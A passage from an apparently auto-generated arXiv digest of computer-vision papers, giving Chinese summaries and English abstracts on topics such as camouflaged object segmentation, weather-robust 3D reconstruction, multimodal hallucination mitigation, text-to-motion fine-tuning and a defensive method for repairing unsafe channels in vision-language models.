Abstract:Cross-view geolocalization (CVGL) systems, while effective at retrieving a list of relevant candidates (high Recall@k), often fail to identify the single best match (low Top-1 accuracy). This work investigates the use of zero-shot Vision-Language Models (VLMs) as rerankers to address this gap. We propose a two-stage framework: state-of-the-art (SOTA) retrieval followed by VLM reranking. We systematically compare two strategies: (1) Pointwise (scoring candidates individually) and (2) Pairwise (comparing candidates relatively). Experiments on the VIGOR dataset show a clear divergence: all pointwise methods cause a catastrophic drop in performance or no change at all. In contrast, a pairwise comparison strategy using LLaVA improves Top-1 accuracy over the strong retrieval baseline. Our analysis concludes that, these VLMs are poorly calibrated for absolute relevance scoring but are effective at fine-grained relative visual judgment, making pairwise reranking a promising direction for enhancing CVGL precision.
[CV-198] IP-SAM: Prompt-Space Conditioning for Prompt-Absent Camouflaged Object Detection
【速读】:该论文旨在解决提示条件下的基础分割模型(prompt-conditioned foundation segmenters)在实际部署中因缺乏显式空间提示(如点、框、掩码)而导致的结构不匹配问题,即模型在推理时无法获取训练阶段依赖的外部提示,从而影响分割性能。其解决方案的关键在于从提示空间(prompt-space)角度重新思考适应机制:提出IP-SAM框架,通过一个自提示生成器(Self-Prompt Generator, SPG)将图像上下文蒸馏为互补的内在提示(intrinsic prompts),作为粗粒度区域锚点,并利用冻结的SAM2提示编码器恢复提示引导的解码过程;同时引入提示空间门控机制(Prompt-Space Gating, PSG),以内在背景提示作为非对称抑制约束,在解码前有效抑制由背景引发的假阳性响应。该策略在无需外部提示的情况下实现了最优性能,并展现出良好的零样本迁移能力。
链接: https://arxiv.org/abs/2603.27250
作者: Huiyao Zhang,Jin Bai,Rui Guo,JianWen Tan,HongFei Wang,Ye Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Prompt-conditioned foundation segmenters have emerged as a dominant paradigm for image segmentation, where explicit spatial prompts (e.g., points, boxes, masks) guide mask decoding. However, many real-world deployments require fully automatic segmentation, creating a structural mismatch: the decoder expects prompts that are unavailable at inference. Existing adaptations typically modify intermediate features, inadvertently bypassing the model’s native prompt interface and weakening prompt-conditioned decoding. We propose IP-SAM, which revisits adaptation from a prompt-space perspective through prompt-space conditioning. Specifically, a Self-Prompt Generator (SPG) distills image context into complementary intrinsic prompts that serve as coarse regional anchors. These cues are projected through SAM2’s frozen prompt encoder, restoring prompt-guided decoding without external intervention. To suppress background-induced false positives, Prompt-Space Gating (PSG) leverages the intrinsic background prompt as an asymmetric suppressive constraint prior to decoding. Under a deterministic no-external-prompt protocol, IP-SAM achieves state-of-the-art performance across four camouflaged object detection benchmarks (e.g., MAE 0.017 on COD10K) with only 21.26M trainable parameters (optimizing SPG, PSG, and a task-specific mask decoder trained from scratch, alongside image-encoder LoRA while keeping the prompt encoder frozen). Furthermore, the proposed conditioning strategy generalizes beyond COD to medical polyp segmentation, where a model trained solely on Kvasir-SEG exhibits strong zero-shot transfer to both CVC-ClinicDB and ETIS.
[CV-199] SaSaSaSa2VA: 2nd Place of the 5th PVUW MeViS-Text Track
【速读】:该论文旨在解决视频目标分割(Video Object Segmentation, VOS)中基于静态文本描述的指代表达(referring expression)任务在处理运动中心表达(motion-centric expressions)时性能不足的问题,尤其是在引入“无目标查询”(no-target queries)场景下的鲁棒性挑战。解决方案的关键在于提出一种简单但有效的目标存在感知验证机制(target existence-aware verification mechanism),通过增强模型对目标是否存在进行判断的能力,在不显著增加复杂度的前提下,显著提升了在MeViS基准上的性能表现,最终在第5届PVUW挑战赛(MeViS-Text Track)中取得89.19的分数并位列第二。
链接: https://arxiv.org/abs/2603.27241
作者: Dengxian Gong,Quanzhu Niu,Shihao Chen,Yuanzheng Wu,Yikang Zhou,Tao Zhang,Haobo Yuan,Lu Qi,Shunping Ji
机构: Wuhan University (武汉大学); University of California, Merced (加州大学默塞德分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Referring video object segmentation (RVOS) commonly grounds targets in videos based on static textual cues. MeViS benchmark extends this by incorporating motion-centric expressions (referring reasoning motion expressions) and introducing no-target queries. Extending SaSaSa2VA, where increased input frames and [SEG] tokens already strengthen the Sa2VA backbone, we adopt a simple yet effective target existence-aware verification mechanism, leading to Still Awesome SaSaSa2VA (SaSaSaSa2VA). Despite its simplicity, the method achieves a final score of 89.19 in the 5th PVUW Challenge (MeViS-Text Track), securing 2nd place. Both quantitative results and ablations suggest that this existence-aware verification strategy is sufficient to unlock strong performance on motion-centric referring tasks.
[CV-200] Diagnosing and Repairing Unsafe Channels in Vision-Language Models via Causal Discovery and Dual-Modal Safety Subspace Projection CVPR2026
【速读】:该论文旨在解决大型视觉语言模型(Large Vision-Language Models, LVLMs)内部安全机制不透明且难以控制的问题,特别是识别并修复导致不安全行为的神经通路。解决方案的关键在于提出一个因果-子空间修复框架(CARE),首先通过因果中介分析(causal mediation analysis)定位对不安全行为具有因果影响的神经元和层;随后设计一种双模态安全子空间投影方法,利用良性与恶意激活之间的广义特征分解学习视觉和文本模态的通用安全子空间,并在推理阶段通过混合融合机制动态地将激活投影至这些子空间,自适应地平衡视觉与文本修正,从而有效抑制不安全特征的同时保持语义保真度。
链接: https://arxiv.org/abs/2603.27240
作者: Jinhu Fu,Yihang Lou,Qingyi Si,Shudong Zhang,Yan Bai,Sen Su
机构: Beijing University of Posts and Telecommunications (北京邮电大学); Huawei Technologies Ltd. (华为技术有限公司); Peking University (北京大学); Chongqing University of Posts and Telecommunications (重庆邮电大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted by CVPR 2026 main conference
Abstract:Large Vision-Language Models (LVLMs) have achieved impressive performance across multimodal understanding and reasoning tasks, yet their internal safety mechanisms remain opaque and poorly controlled. In this work, we present a comprehensive framework for diagnosing and repairing unsafe channels within LVLMs (CARE). We first perform causal mediation analysis to identify neurons and layers that are causally responsible for unsafe behaviors. Based on these findings, we introduce a dual-modal safety subspace projection method that learns generalized safety subspaces for both visual and textual modalities through generalized eigen-decomposition between benign and malicious activations. During inference, activations are dynamically projected toward these safety subspaces via a hybrid fusion mechanism that adaptively balances visual and textual corrections, effectively suppressing unsafe features while preserving semantic fidelity. Extensive experiments on multiple safety benchmarks demonstrate that our causal-subspace repair framework significantly enhances safety robustness without degrading general multimodal capabilities, outperforming prior activation steering and alignment-based baselines. Additionally, our method exhibits good transferability, defending against unseen attacks.
[CV-201] An Instance-Centric Panoptic Occupancy Prediction Benchmark for Autonomous Driving CVPR2026
【速读】:该论文旨在解决3D全景占用预测(panoptic occupancy prediction)任务中缺乏高质量、高分辨率且具备实例级标注的物理一致数据集的问题。当前基准数据集普遍存在几何信息不完整、分辨率低以及缺少实例级注释等局限,制约了模型在精确几何重建、可靠遮挡推理和整体三维理解方面的性能提升。解决方案的关键在于构建两个核心资源:一是面向自动驾驶场景的统一高质量3D网格库ADMesh,包含超过15,000个带纹理和丰富语义标注的3D模型;二是基于CARLA模拟器生成的大规模物理一致全景占用数据集CarlaOcc,涵盖超10万帧、分辨率达0.05米的体素级实例级标注。此外,论文还提出了标准化评估指标并建立了系统性基准测试平台,为该领域的公平比较与可复现研究提供了坚实基础。
链接: https://arxiv.org/abs/2603.27238
作者: Yi Feng,Junwu E,Zizhan Guo,Yu Ma,Hanli Wang,Rui Fan
机构: Tongji University (同济大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026. Code and dataset are available at this https URL
Abstract:Panoptic occupancy prediction aims to jointly infer voxel-wise semantics and instance identities within a unified 3D scene representation. Nevertheless, progress in this field remains constrained by the absence of high-quality 3D mesh resources, instance-level annotations, and physically consistent occupancy datasets. Existing benchmarks typically provide incomplete and low-resolution geometry without instance-level annotations, limiting the development of models capable of achieving precise geometric reconstruction, reliable occlusion reasoning, and holistic 3D understanding. To address these challenges, this paper presents an instance-centric benchmark for the 3D panoptic occupancy prediction task. Specifically, we introduce ADMesh, the first unified 3D mesh library tailored for autonomous driving, which integrates over 15K high-quality 3D models with diverse textures and rich semantic annotations. Building upon ADMesh, we further construct CarlaOcc, a large-scale, physically consistent panoptic occupancy dataset generated using the CARLA simulator. This dataset contains over 100K frames with fine-grained, instance-level occupancy ground truth at voxel resolutions as fine as 0.05 m. Furthermore, standardized evaluation metrics are introduced to quantify the quality of existing occupancy datasets. Finally, a systematic benchmark of representative models is established on the proposed dataset, which provides a unified platform for fair comparison and reproducible research in the field of 3D panoptic perception. Code and dataset are available at this https URL.
[CV-202] NimbusGS: Unified 3D Scene Reconstruction under Hybrid Weather CVPR2026
【速读】:该论文旨在解决在多种混合恶劣天气条件下,从退化多视角图像中重建高质量三维场景的问题。现有方法通常针对特定天气类型设计,缺乏泛化能力;而本文提出 NimbusGS 框架,通过建模天气的双重特性——一种连续且视角一致的介质(attenuates light)导致光衰减,以及动态且视角依赖的粒子(causes scattering and occlusion)引发散射和遮挡——实现更通用的重建。其关键创新在于将退化分解为全局传输场(global transmission field)与每视图的颗粒残差(per-view particulate residuals),并引入几何引导的梯度缩放机制(geometry-guided gradient scaling),以缓解自监督优化过程中 3D 高斯表示的梯度失衡问题,从而在严重能见度下降条件下稳定学习几何结构,显著优于任务特定方法。
链接: https://arxiv.org/abs/2603.27228
作者: Yanying Li,Jinyang Li,Shengfeng He,Yangyang Xu,Junyu Dong,Yong Du
机构: Ocean University of China (中国海洋大学); Singapore Management University (新加坡管理大学); Harbin Institute of Technology (Shenzhen) (哈尔滨工业大学(深圳)); Sanya Oceanographic Institution (三亚海洋研究所)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:We present NimbusGS, a unified framework for reconstructing high-quality 3D scenes from degraded multi-view inputs captured under diverse and mixed adverse weather conditions. Unlike existing methods that target specific weather types, NimbusGS addresses the broader challenge of generalization by modeling the dual nature of weather: a continuous, view-consistent medium that attenuates light, and dynamic, view-dependent particles that cause scattering and occlusion. To capture this structure, we decompose degradations into a global transmission field and per-view particulate residuals. The transmission field represents static atmospheric effects shared across views, while the residuals model transient disturbances unique to each input. To enable stable geometry learning under severe visibility degradation, we introduce a geometry-guided gradient scaling mechanism that mitigates gradient imbalance during the self-supervised optimization of 3D Gaussian representations. This physically grounded formulation allows NimbusGS to disentangle complex degradations while preserving scene structure, yielding superior geometry reconstruction and outperforming task-specific methods across diverse and challenging weather conditions. Code is available at this https URL.
[CV-203] EuraG ovExam: A Multilingual Multimodal Benchmark from Real-World Civil Service Exams
【速读】:该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在高风险、多语言、图像基础场景下评估能力不足的问题,特别是针对公共部门考试这类具有复杂视觉结构和跨语言语境的真实任务。解决方案的关键在于构建EuraGovExam——一个源自五大欧亚地区真实公务员考试的多语言、多模态基准数据集,其中所有题目内容(包括题干、选项与视觉元素)均嵌入单一高分辨率图像中,并仅提供极简格式化指令,从而强制模型执行布局感知的跨语言推理,直接从视觉输入中提取信息。该设计显著提升了评估难度,使现有最优VLMs准确率仅为86%,有效揭示了当前模型在文化真实性、视觉复杂性和语言多样性方面的局限性。
链接: https://arxiv.org/abs/2603.27223
作者: JaeSeong Kim,Chaehwan Lim,Sang Hyun Gil,Suan Lee
机构: Semyung University (世明大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We present EuraGovExam, a multilingual and multimodal benchmark sourced from real-world civil service examinations across five representative Eurasian regions: South Korea, Japan, Taiwan, India, and the European Union. Designed to reflect the authentic complexity of public-sector assessments, the dataset contains over 8,000 high-resolution scanned multiple-choice questions covering 17 diverse academic and administrative domains. Unlike existing benchmarks, EuraGovExam embeds all question content–including problem statements, answer choices, and visual elements–within a single image, providing only a minimal standardized instruction for answer formatting. This design demands that models perform layout-aware, cross-lingual reasoning directly from visual input. All items are drawn from real exam documents, preserving rich visual structures such as tables, multilingual typography, and form-like layouts. Evaluation results show that even state-of-the-art vision-language models (VLMs) achieve only 86% accuracy, underscoring the benchmark’s difficulty and its power to diagnose the limitations of current models. By emphasizing cultural realism, visual complexity, and linguistic diversity, EuraGovExam establishes a new standard for evaluating VLMs in high-stakes, multilingual, image-grounded settings. It also supports practical applications in e-governance, public-sector document analysis, and equitable exam preparation.
[CV-204] HD-VGGT: High-Resolution Visual Geometry Transformer
【速读】:该论文旨在解决高分辨率三维重建中因Transformer架构计算与内存开销过大,以及视觉模糊区域(如重复纹理、弱纹理或镜面表面)导致特征不稳定从而影响几何推理精度的问题。其解决方案的关键在于提出一种双分支架构HD-VGGT:低分辨率分支生成全局一致的粗略几何结构,高分辨率分支通过学习的特征上采样模块细化细节;同时引入特征调制(Feature Modulation)机制,在Transformer早期阶段抑制不可靠特征,从而提升模型在高分辨率输入下的效率与鲁棒性。
链接: https://arxiv.org/abs/2603.27222
作者: Tianrun Chen,Yuanqi Hu,Yidong Han,Hanjie Xu,Deyi Ji,Qi Zhu,Chunan Yu,Xin Zhang,Cheng Chen,Chaotao Ding,Ying Zang,Xuanfu Li,Jin Ma,Lanyun Zhu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:High-resolution imagery is essential for accurate 3D reconstruction, as many geometric details only emerge at fine spatial scales. Recent feed-forward approaches, such as the Visual Geometry Grounded Transformer (VGGT), have demonstrated the ability to infer scene geometry from large collections of images in a single forward pass. However, scaling these models to high-resolution inputs remains challenging: the number of tokens in transformer architectures grows rapidly with both image resolution and the number of views, leading to prohibitive computational and memory costs. Moreover, we observe that visually ambiguous regions, such as repetitive patterns, weak textures, or specular surfaces, often produce unstable feature tokens that degrade geometric inference, especially at higher resolutions. We introduce HD-VGGT, a dual-branch architecture for efficient and robust high-resolution 3D reconstruction. A low-resolution branch predicts a coarse, globally consistent geometry, while a high-resolution branch refines details via a learned feature upsampling module. To handle unstable tokens, we propose Feature Modulation, which suppresses unreliable features early in the transformer. HD-VGGT leverages high-resolution images and supervision without full-resolution transformer costs, achieving state-of-the-art reconstruction quality.
[CV-205] Make It Up: Fake Images Real Gains in Generalized Few-shot Semantic Segmentation
【速读】:该论文旨在解决广义少样本语义分割(Generalized Few-Shot Semantic Segmentation, GFSS)中因标注稀缺导致的新类别外观覆盖不足的问题,尤其是在掩码(mask)不可靠或缺失时,扩散模型生成的合成数据易出现覆盖不全与噪声监督的问题。其解决方案的关键在于提出Syn4Seg框架,通过两个核心机制实现:一是构建去重嵌入提示库(embedding-deduplicated prompt bank),以最大化提示空间覆盖并生成多样且类一致的合成图像;二是采用两阶段伪标签优化策略,首先过滤低一致性区域获得高精度种子,再结合全局支持集与局部图像统计信息自适应地重新标注不确定像素,最终仅对边界带和未标记像素进行约束性SAM(Segment Anything Model)更新,从而在不破坏高置信度内部区域的前提下提升边界保真度。
链接: https://arxiv.org/abs/2603.27206
作者: Guohuan Xie,Xin He,Dingying Fan,Le Zhang,Ming-Ming Cheng,Yun Liu
机构: Nankai University (南开大学); Tianjin University of Technology (天津理工大学); UESTC (电子科技大学); NKIARI (南开大学人工智能研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Generalized few-shot semantic segmentation (GFSS) is fundamentally limited by the coverage of novel-class appearances under scarce annotations. While diffusion models can synthesize novel-class images at scale, practical gains are often hindered by insufficient coverage and noisy supervision when masks are unavailable or unreliable. We propose Syn4Seg, a generation-enhanced GFSS framework designed to expand novel-class coverage while improving pseudo-label quality. Syn4Seg first maximizes prompt-space coverage by constructing an embedding-deduplicated prompt bank for each novel class, yielding diverse yet class-consistent synthetic images. It then performs support-guided pseudo-label estimation via a two-stage refinement that i) filters low-consistency regions to obtain high-precision seeds and ii) relabels uncertain pixels with image-adaptive prototypes that combine global (support) and local (image) statistics. Finally, we refine only boundary-band and unlabeled pixels using a constrained SAM-based update to improve contour fidelity without overwriting high-confidence interiors. Extensive experiments on PASCAL- 5^i and COCO- 20^i demonstrate consistent improvements in both 1-shot and 5-shot settings, highlighting synthetic data as a scalable path for GFSS with reliable masks and precise boundaries.
[CV-206] Understanding and Mitigating Hallucinations in Multimodal Chain-of-Thought Models CVPR2026
【速读】:该论文旨在解决多模态思维链(Multimodal Chain-of-Thought, MCoT)模型在复杂视觉推理任务中存在严重幻觉(hallucination)的问题,尤其关注其由生成过程中视觉注意力衰减所引发的错误信息编造现象。研究表明,MCoT模型的幻觉主要出现在关联推理步骤中,这一过程被作者称为“发散性思维”(divergent thinking)。解决方案的关键在于识别并定位这些发散性思维步骤,并通过干预解码过程来抑制幻觉生成,从而显著提升推理准确性。该方法简单有效,且可与现有幻觉缓解技术兼容,进一步增强整体性能。
链接: https://arxiv.org/abs/2603.27201
作者: Ji Ma,Wei Suo,Peng Wang,Yanning Zhang
机构: Northwestern Polytechnical University (西北工业大学); National Engineering Laboratory for Integrated Aero-Space-Ground-Ocean Big Data Application Technology (国家航空航天海一体化大数据应用技术工程实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Multimodal Chain-of-Thought (MCoT) models have demonstrated impressive capability in complex visual reasoning tasks. Unfortunately, recent studies reveal that they suffer from severe hallucination problems due to diminished visual attention during the generation process. However, visual attention decay is a well-studied problem in Large Vision-Language Models (LVLMs). Considering the fundamental differences in reasoning processes between MCoT models and traditional LVLMs, we raise a basic question: Whether MCoT models have unique causes of hallucinations? To answer this question, we systematically investigate the hallucination patterns of MCoT models and find that fabricated texts are primarily generated in associative reasoning steps, which we term divergent thinking. Leveraging these insights, we introduce a simple yet effective strategy that can effectively localize divergent thinking steps and intervene in the decoding process to mitigate hallucinations. Extensive experiments show that our method outperforms existing methods by a large margin. More importantly, our proposed method can be conveniently integrated with other hallucination mitigation methods and further boost their performance. The code is publicly available at this https URL.
[CV-207] Let Triggers Control: Frequency-Aware Dropout for Effective Token Control CVPR2026
【速读】:该论文旨在解决生成式 AI(Generative AI)中文本到图像模型(如 Stable Diffusion)在个性化微调过程中因单一触发词(trigger token)与上下文频繁共现而导致的可控性差的问题,即触发词无法稳定地激发目标概念。其解决方案的关键在于提出一种无需增加参数的正则化技术——频率感知丢弃(Frequency-Aware Dropout, FAD),该方法通过共现分析识别高频耦合模式,并结合受课程学习启发的调度策略,在训练中动态抑制触发词与其周围语境的纠缠表示,从而增强触发词的语义独立性和生成可控性。
链接: https://arxiv.org/abs/2603.27199
作者: Junyoung Koh,Hoyeon Moon,Dongha Kim,Seungmin Lee,Sanghyun Park,Min Song
机构: Yonsei University (延世大学); Onoma AI
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026 P13N: Personalization in Generative AI workshop
Abstract:Text-to-image models such as Stable Diffusion have achieved unprecedented levels of high-fidelity visual synthesis. As these models advance, personalization of generative models – commonly facilitated through Low-Rank Adaptation (LoRA) with a dedicated trigger token – has become a significant area of research. Previous works have naively assumed that fine-tuning with a single trigger token to represent new concepts. However, this often results in poor controllability, where the trigger token alone fails to reliably evoke the intended concept. We attribute this issue to the frequent co-occurrence of the trigger token with the surrounding context during fine-tuning, which entangles their representations and compromises the token’s semantic distinctiveness. To disentangle this, we propose Frequency-Aware Dropout (FAD) – a novel regularization technique that improves prompt controllability without adding new parameters. FAD consists of two key components: co-occurrence analysis and curriculum-inspired scheduling. Qualitative and quantitative analyses across token-based diffusion models (SD~1.5 and SDXL) and natural language–driven backbones (FLUX and Qwen-Image) demonstrate consistent gains in prompt fidelity, stylistic precision, and user-perceived quality. Our method provides a simple yet effective dropout strategy that enhances controllability and personalization in text-to-image generation. Notably, it achieves these improvements without introducing additional parameters or architectural modifications, making it readily applicable to existing models with minimal computational overhead.
[CV-208] KαLOS finds Consensus: A Meta-Algorithm for Evaluating Inter-Annotator Agreement in Complex Vision Tasks CVPR2026
【速读】:该论文旨在解决当前目标检测基准测试中因标注噪声(label noise)导致的性能评估不可靠问题,即难以区分模型改进与标注误差之间的差异。其核心挑战在于现有统计指标无法有效处理视觉任务中的实例对应(instance correspondence)问题,且缺乏客观的标注一致性真值以验证新度量方法的有效性,从而迫使研究者依赖不可验证的启发式策略。解决方案的关键是提出K α LOS(KALOS),一种统一的元算法,它通过“先定位后一致性评估”的原则,将复杂的时空分类问题转化为名义可靠性矩阵;其创新之处在于基于数据驱动的方式对定位参数进行统计校准,使其能适应从边界框到体素分割或姿态估计等多种任务,并提供细粒度诊断能力(如标注者活力、协作聚类和定位敏感性),从而实现对数据集质量的标准化评估,有效区分信号与噪声。
链接: https://arxiv.org/abs/2603.27197
作者: David Tschirschwitz,Volker Rodehorst
机构: Bauhaus-Universität Weimar (包豪斯大学魏玛分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at CVPR 2026. Also known as KALOS
Abstract:Progress in object detection benchmarks is stagnating. It is limited not by architectures but by the inability to distinguish model improvements from label noise. To restore trust in benchmarking the field requires rigorous quantification of annotation consistency to ensure the reliability of evaluation data. However, standard statistical metrics fail to handle the instance correspondence problem inherent to vision tasks. Furthermore, validating new agreement metrics remains circular because no objective ground truth for agreement exists. This forces reliance on unverifiable heuristics. We propose K \alpha LOS (KALOS), a unified meta-algorithm that generalizes the “Localization First” principle to standardize dataset quality evaluation. By resolving spatial correspondence before assessing agreement, our framework transforms complex spatio-categorical problems into nominal reliability matrices. Unlike prior heuristic implementations, K \alpha LOS employs a principled, data-driven configuration; by statistically calibrating the localization parameters to the inherent agreement distribution, it generalizes to diverse tasks ranging from bounding boxes to volumetric segmentation or pose estimation. This standardization enables granular diagnostics beyond a single score. These include annotator vitality, collaboration clustering, and localization sensitivity. To validate this approach, we introduce a novel and empirically derived noise generator. Where prior validations relied on uniform error assumptions, our controllable testbed models complex and non-isotropic human variability. This provides evidence of the metric’s properties and establishes K \alpha LOS as a robust standard for distinguishing signal from noise in modern computer vision benchmarks. Comments: Accepted at CVPR 2026. Also known as KALOS Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.27197 [cs.CV] (or arXiv:2603.27197v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.27197 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-209] MotionRFT: Unified Reinforcement Fine-Tuning for Text-to-Motion Generation
【速读】:该论文旨在解决文本驱动动作生成(text-to-motion generation)中监督预训练难以对齐高层次目标(如语义一致性、真实感和人类偏好)的问题。现有后训练方法存在三大局限:针对特定运动表示(如关节)、优化单一维度且可能损害其他因素,以及计算开销大、数据依赖强、优化粒度粗。解决方案的关键在于提出一个强化微调框架,包含两个核心组件:一是异构表示的多维奖励模型 MotionReward,通过将不同运动表示映射到由文本锚定的统一语义空间,实现多维奖励学习;二是高效细粒度微调方法 EasyTune,识别去噪步骤间的递归梯度依赖为关键瓶颈,采用逐步优化而非全轨迹优化策略,从而实现密集、细粒度且内存高效的更新。该框架在多个基准上显著提升性能,同时大幅降低显存占用。
链接: https://arxiv.org/abs/2603.27185
作者: Xiaofeng Tan,Wanjiang Weng,Hongsong Wang,Fang Zhao,Xin Geng,Liang Wang
机构: Southeast University (东南大学); Nanjing University (南京大学); Chinese Academy of Sciences (中国科学院); University of Chinese Academy of Sciences (中国科学院大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Text-to-motion generation has advanced with diffusion- and flow-based generative models, yet supervised pretraining remains insufficient to align models with high-level objectives such as semantic consistency, realism, and human preference. Existing post-training methods have key limitations: they (1) target a specific motion representation, such as joints, (2) optimize a particular aspect, such as text-motion alignment, and may compromise other factors; and (3) incur substantial computational overhead, data dependence, and coarse-grained optimization. We present a reinforcement fine-tuning framework that comprises a heterogeneous-representation, multi-dimensional reward model, MotionReward, and an efficient, fine-grained fine-tuning method, EasyTune. To obtain a unified semantics representation, MotionReward maps heterogeneous motions into a shared semantic space anchored by text, enabling multidimensional reward learning; Self-refinement Preference Learning further enhances semantics without additional annotations. For efficient and effective fine-tuning, we identify the recursive gradient dependence across denoising steps as the key bottleneck, and propose EasyTune, which optimizes step-wise rather than over the full trajectory, yielding dense, fine-grained, and memory-efficient updates. Extensive experiments validate the effectiveness of our framework, achieving FID 0.132 at 22.10 GB peak memory for MLD model and saving up to 15.22 GB over DRaFT. It reduces FID by 22.9% on joint-based ACMDM, and achieves a 12.6% R-Precision gain and 23.3% FID improvement on rotation-based HY Motion. Our project page with code is publicly available.
[CV-210] Incentivizing Temporal-Awareness in Egocentric Video Understanding Models
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在第一人称视频理解中普遍缺乏时间感知能力的问题,尤其是在依赖事件正确时序与演化推理的场景下。现有模型常因训练目标未能显式奖励时间推理,而倾向于利用帧级空间捷径(spatial shortcuts),导致对事件顺序和因果关系的理解不足。解决方案的关键在于提出一种基于可验证奖励的强化学习算法——时间全局策略优化(Temporal Global Policy Optimization, TGPO),其通过对比模型在时序有序与打乱视频帧下的输出,生成校准且全局归一化的奖励信号,从而明确激励模型进行时序一致的推理。TGPO结合GRPO和GSPO支持冷启动强化学习训练,并有效抑制现有MLLMs习得的空间捷径行为,在五个第一人称视频基准测试中显著提升时间定位精度与因果连贯性。
链接: https://arxiv.org/abs/2603.27184
作者: Zhiyang Xu,Tian Qin,Bowen Jin,Zhengfeng Lai,Meng Cao,Lifu Huang,Peng Zhang
机构: Virginia Tech (弗吉尼亚理工大学); Apple (苹果公司); UC Davis (加州大学戴维斯分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 11 pages, 4 figures
Abstract:Multimodal large language models (MLLMs) have recently shown strong performance in visual understanding, yet they often lack temporal awareness, particularly in egocentric settings where reasoning depends on the correct ordering and evolution of events. This deficiency stems in part from training objectives that fail to explicitly reward temporal reasoning and instead rely on frame-level spatial shortcuts. To address this limitation, we propose Temporal Global Policy Optimization (TGPO), a reinforcement learning with verifiable rewards (RLVR) algorithm designed to incentivize temporal awareness in MLLMs. TGPO contrasts model outputs generated from temporally ordered versus shuffled video frames to derive calibrated, globally normalized reward signals that explicitly favor temporally coherent reasoning. Integrated with GRPO and GSPO, TGPO supports cold-start RL training and effectively suppresses spatial shortcut behaviors learned by existing MLLMs. Experiments across five egocentric video benchmarks demonstrate that TGPO consistently improves temporal grounding and causal coherence, outperforming prior RL-based video reasoning approaches. Our results suggest that TGPO offers a simple and scalable pathway toward temporally robust MLLMs for egocentric video understanding.
[CV-211] Communicating about Space: Language-Mediated Spatial Integration Across Partial Views
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)是否能够像人类一样,通过自然语言对话整合不同视角的局部观测信息,从而构建一个共享的、非自我中心(allocentric)环境认知模型的问题。其解决方案的关键在于引入COSMIC基准测试平台,该平台模拟两个静态MLLM代理在3D室内环境中从不同视角观察并交换自然语言信息以解答空间查询任务,涵盖899个场景和1250个问答对,涉及五类空间推理任务。实验表明,尽管当前前沿模型(如Gemini-3-Pro-Thinking)在锚定对象识别上表现可靠,但在关系推理和全局一致地图构建方面仍接近随机水平,且缺乏有效收敛于共享心理模型的能力,这揭示了MLLMs在协同空间通信中的核心局限。
链接: https://arxiv.org/abs/2603.27183
作者: Ankur Sikarwar,Debangan Mishra,Sudarshan Nikhil,Ponnurangam Kumaraguru,Aishwarya Agrawal
机构: Mila – Quebec AI Institute (Mila –魁北克人工智能研究所); Université de Montréal (蒙特利尔大学); IIIT Hyderabad (印度国际信息技术学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Humans build shared spatial understanding by communicating partial, viewpoint-dependent observations. We ask whether Multimodal Large Language Models (MLLMs) can do the same, aligning distinct egocentric views through dialogue to form a coherent, allocentric mental model of a shared environment. To study this systematically, we introduce COSMIC, a benchmark for Collaborative Spatial Communication. In this setting, two static MLLM agents observe a 3D indoor environment from different viewpoints and exchange natural-language messages to solve spatial queries. COSMIC contains 899 diverse scenes and 1250 question-answer pairs spanning five tasks. We find a consistent capability hierarchy, MLLMs are most reliable at identifying shared anchor objects across views, perform worse on relational reasoning, and largely fail at building globally consistent maps, performing near chance, even for the frontier models. Moreover, we find thinking capability yields consistent gains in anchor grounding, but is insufficient for higher-level spatial communication. To contextualize model behavior, we additionally collect 250 human-human dialogues. Humans achieve 95% aggregate accuracy, leaving significant room for improvement for even the best performing model Gemini-3-Pro-Thinking which achieves 72% aggregate accuracy. Moreover, human conversations become increasingly specific as partners converge on a shared mental model, whereas model dialogues continue to explore new possibilities rather than converging, consistent with a limited ability to build and maintain a robust shared mental model. Our code and data is available at this https URL
[CV-212] Reasoning -Driven Anomaly Detection and Localization with Image-Level Supervision CVPR2026
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在异常检测任务中难以实现像素级定位与可解释推理的问题,尤其是现有方法依赖外部视觉模块和密集像素级标注,限制了其泛化能力与实用性。解决方案的关键在于提出一种名为“推理驱动的异常定位”(Reasoning-Driven Anomaly Localization, ReAL)的方法,通过挖掘MLLM自回归推理过程中生成的异常相关token,并聚合其注意力响应以生成像素级异常图;同时引入一致性引导的推理优化(Consistency-Guided Reasoning Optimization, CGRO)模块,利用强化学习对齐推理token与视觉注意力,从而提升推理的一致性与定位精度。该方案仅需图像级监督即可实现媲美密集标注训练方法的性能,显著推动了无需额外组件或像素标签的端到端异常检测与解释能力的发展。
链接: https://arxiv.org/abs/2603.27179
作者: Yizhou Jin,Yuezhu Feng,Jinjin Zhang,Peng Wang,Qingjie Liu,Yunhong Wang
机构: Beihang University (北京航空航天大学); Hangzhou Innovation Institute, Beihang University (杭州创新研究院,北京航空航天大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
